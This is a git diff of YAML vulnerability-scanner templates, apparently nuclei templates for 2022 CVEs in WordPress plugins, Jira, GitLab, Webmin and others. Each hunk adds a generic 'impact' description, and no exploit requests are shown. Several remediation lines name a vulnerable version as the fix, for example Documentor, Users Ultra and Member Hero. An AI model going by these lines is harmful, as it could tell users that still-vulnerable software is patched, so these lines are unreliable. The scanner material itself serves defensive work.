@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability. It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: | Update to the latest version of the WordPress Page Views Count plugin (2.4.15) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0437.yaml b/http/cves/2022/CVE-2022-0437.yaml index ddefe92a4b..4cb00b8764 100644 --- a/http/cves/2022/CVE-2022-0437.yaml +++ b/http/cves/2022/CVE-2022-0437.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: NPM karma prior to 6.3.14. contains a DOM-based cross-site Scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of karma-runner that includes proper input sanitization to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml index 197bc2aabf..b168fe8249 100644 --- a/http/cves/2022/CVE-2022-0441.yaml +++ b/http/cves/2022/CVE-2022-0441.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially compromising user data and system integrity. remediation: | Upgrade to the latest version of the MasterStudy LMS plugin (2.7.6 or higher) to fix the improper access control issue. reference: diff --git a/http/cves/2022/CVE-2022-0482.yaml b/http/cves/2022/CVE-2022-0482.yaml index 819fb3bd5c..0f12d027b0 100644 --- a/http/cves/2022/CVE-2022-0482.yaml +++ b/http/cves/2022/CVE-2022-0482.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive data or perform unauthorized actions. remediation: | Upgrade Easy!Appointments to version 1.4.4 or above to fix the Broken Access Control vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml index ebf16bbaa9..68582e3ac8 100644 --- a/http/cves/2022/CVE-2022-0535.yaml +++ b/http/cves/2022/CVE-2022-0535.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress E2Pdf plugin before 1.16.45 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, even when the unfiltered_html capability is disallowed. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, making it possible to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update the WordPress E2Pdf plugin to version 1.16.45 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml index 16add28a26..a6ef2e7d04 100644 --- a/http/cves/2022/CVE-2022-0540.yaml +++ b/http/cves/2022/CVE-2022-0540.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, modification of data, and potential disruption of business operations. remediation: Ensure you are using the latest version and that all security patches have been applied. reference: - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ 
diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index d5ce387354..d747eb3d73 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users. + impact: | + An attacker can send crafted requests to the server, potentially leading to unauthorized access to internal resources or network scanning. remediation: | Upgrade to Formcraft3 version 3.8.28 or later to fix the SSRF vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0594.yaml b/http/cves/2022/CVE-2022-0594.yaml index 5723836d28..227ddc686c 100644 --- a/http/cves/2022/CVE-2022-0594.yaml +++ b/http/cves/2022/CVE-2022-0594.yaml @@ -5,6 +5,8 @@ info: author: atomiczsec severity: medium description: WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.). + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Update the Shareaholic plugin to version 9.7.6 or later to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0595.yaml b/http/cves/2022/CVE-2022-0595.yaml index d7f8306b69..6535dba5b2 100644 --- a/http/cves/2022/CVE-2022-0595.yaml +++ b/http/cves/2022/CVE-2022-0595.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Contact Form 7 before 1.3.6.3 contains an unauthenticated stored cross-site scripting vulnerability in the Drag and Drop Multiple File Upload plugin. SVG files can be uploaded by default via the dnd_codedropz_upload AJAX action. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. remediation: | Update the WordPress Contact Form 7 plugin to version 1.3.6.3 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index 78ad436fba..18d87067da 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Mapping Multiple URLs Redirect Same Page plugin (version 5.8 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml index 9cd9df8a14..5f01e3d1af 100644 --- a/http/cves/2022/CVE-2022-0653.yaml +++ b/http/cves/2022/CVE-2022-0653.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Upgrade to version 3.6.5 or later. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653 diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index 0dd691838f..bf89ac7fc6 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -5,6 +5,8 @@ info: author: akincibor severity: high description: uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc). + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Upgrade uDraw to version 3.3.3 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index e2424de0d1..271784ef50 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. remediation: | Upgrade Microweber to version 1.2.11 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index 98be7352f2..68362d634c 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade Microweber CMS to version 1.2.11 or later, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0679.yaml b/http/cves/2022/CVE-2022-0679.yaml index fd1fce7c9e..939413f61f 100644 --- a/http/cves/2022/CVE-2022-0679.yaml +++ b/http/cves/2022/CVE-2022-0679.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration. + impact: | + The vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Update to the latest version of the WordPress Narnoo Distributor plugin (>=2.5.2) to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml index 1b86f1d7bc..272963374f 100644 --- a/http/cves/2022/CVE-2022-0692.yaml +++ b/http/cves/2022/CVE-2022-0692.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware. remediation: | Upgrade to version 3.0.1 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 92d6328b43..0debdbc2d0 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Master Elements plugin through 8.0 contains a SQL injection vulnerability. The plugin does not validate and escape the meta_ids parameter of its remove_post_meta_condition AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. remediation: | Update to the latest version of WordPress Master Elements plugin (>=8.1) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index be212e1c03..3ac9b81844 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -5,6 +5,8 @@ info: author: GitLab Red Team severity: critical description: GitLab CE/EE is susceptible to information disclosure. An attacker can access runner registration tokens using quick actions commands, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are from 12.10 before 14.6.5, from 14.7 before 14.7.4, and from 14.8 before 14.8.2. + impact: | + An attacker can gain access to sensitive information stored in GitLab. remediation: | Apply the necessary patches or updates provided by GitLab to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index 4123edc774..21539a4cc7 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | The Infographic Maker WordPress plugin before 4.3.8 does not validate and escape the post_id parameter before using it in a SQL statement via the qcld_upvote_action AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL Injection. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the WordPress site. remediation: Fixed in version 4.3.8 reference: - https://wpscan.com/vulnerability/a8575322-c2cf-486a-9c37-71a22167aac3 diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml index b8940f94fd..784abebcb8 100644 --- a/http/cves/2022/CVE-2022-0760.yaml +++ b/http/cves/2022/CVE-2022-0760.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Simple Link Directory plugin before 7.7.2 contains a SQL injection vulnerability. The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action, available to unauthenticated and authenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the WordPress site. remediation: | Update to the latest version of WordPress Simple Link Directory plugin (7.7.2 or higher) to mitigate the SQL injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 3b1954d1ed..5dfd9a50e7 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update to Users Ultra version 3.1.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml index 7061f1efa8..241177c187 100644 --- a/http/cves/2022/CVE-2022-0773.yaml +++ b/http/cves/2022/CVE-2022-0773.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Update to Documentor version 1.5.3 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index 3490241d59..235b7690d1 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml 
@@ -5,6 +5,8 @@ info: author: LogicalHunter severity: medium description: RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to RevealJS postMessage version 4.3.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index bb2f339f37..a146aae90e 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Nirweb support plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Update to the latest version of the WordPress Nirweb Support plugin (2.8.2 or higher) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index bb6398b08d..e50aea7a46 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update to the latest version of WordPress Title Experiments Free plugin (9.0.1 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index 26ab8912d7..2b5ff58a89 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database and potentially sensitive information leakage. remediation: | Update to the latest version of the WordPress Daily Prayer Time plugin (2022.03.01) to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 1cf1a32d17..fc06852b4e 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress KiviCare plugin before 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: | Update to the latest version of the KiviCare plugin (2.3.9) or apply the provided patch to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml index 8f24319a60..c76c1e0dc9 100644 --- a/http/cves/2022/CVE-2022-0788.yaml +++ b/http/cves/2022/CVE-2022-0788.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or manipulation of the WordPress database. remediation: | Update WP Fundraising Donation and Crowdfunding Platform to version 1.5.0 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index 71a3931987..b6f5bc018d 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update to the latest version of the BadgeOS plugin (>=3.7.1) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml index 6824c4defe..586acc2faa 100644 --- a/http/cves/2022/CVE-2022-0824.yaml +++ b/http/cves/2022/CVE-2022-0824.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: Webmin before 1.990 is susceptible to improper access control in GitHub repository webmin/webmin. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Upgrade Webmin to version 1.990 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index 76b3b0a8d3..c16ad06b0e 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. remediation: | Update to the latest version of WP Video Gallery plugin (>=1.7.2) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index 3e227b750b..f253291e99 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Best Books plugin through 2.6.3 is susceptible to SQL injection. The plugin does not sanitize and escape some parameters before using them in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update to WordPress Best Books plugin version 2.6.3 or later to fix the SQL injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index a66e61b458..44286db737 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version 2.14.15.1 reference: - https://wpscan.com/vulnerability/b030296d-688e-44a4-a48a-140375f2c5f4 diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index 419e25b6cf..e9db28f6ac 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update UpdraftPlus plugin to version 1.22.9 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml index 113b66774b..66bc69ed10 100644 --- a/http/cves/2022/CVE-2022-0867.yaml +++ b/http/cves/2022/CVE-2022-0867.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update to the latest version of ARPrice plugin (3.6.1) or apply the vendor-provided patch. reference: diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index 2b214a1f50..f984dba146 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Multiple Open Redirect in GitHub repository nitely/spirit prior to 0.12.3. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Upgrade to a patched version of nitely/spirit to mitigate the open redirect vulnerability (CVE-2022-0869). reference: diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index bb2b349f4e..c98111ac0f 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Gogs GitHub repository before 0.12.5 is susceptible to server-side request forgery. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources. remediation: Fixed in version 0.12.5. reference: - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index 89eaa0e9f4..6118c8b211 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Member Hero plugin through 1.0.9 is susceptible to remote code execution. The plugin lacks authorization checks and does not validate the a request parameter in an AJAX action, allowing an attacker to call arbitrary PHP functions with no arguments. An attacker can thus execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + An attacker can execute arbitrary code on the target system, potentially leading to a complete compromise of the WordPress site. remediation: | Update to the latest version of the Member Hero plugin (1.0.9 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index efc383351e..37d85c5dd4 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability via the Type parameter in the body of POST request, which is triggered by Add/Edit Tax. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Microweber to version 1.2.12 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml index 2b23308e86..0e66992fe6 100644 --- a/http/cves/2022/CVE-2022-0948.yaml +++ b/http/cves/2022/CVE-2022-0948.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update the WordPress Order Listener for WooCommerce plugin to version 3.2.2 or later. reference: diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index 4701d4112b..91adca580d 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Stop Bad Bots plugin before 6.930 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: Fixed in version 6.930. reference: - https://wpscan.com/vulnerability/a0fbb79a-e160-49df-9cf2-18ab64ea66cb diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml index c08729256e..99801ac884 100644 --- a/http/cves/2022/CVE-2022-0952.yaml +++ b/http/cves/2022/CVE-2022-0952.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Sitemap by click5 plugin before 1.0.36 is susceptible to missing authorization. The plugin does not have authorization or CSRF checks when updating options via a REST endpoint and does not ensure that the option to be updated belongs to the plugin. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. 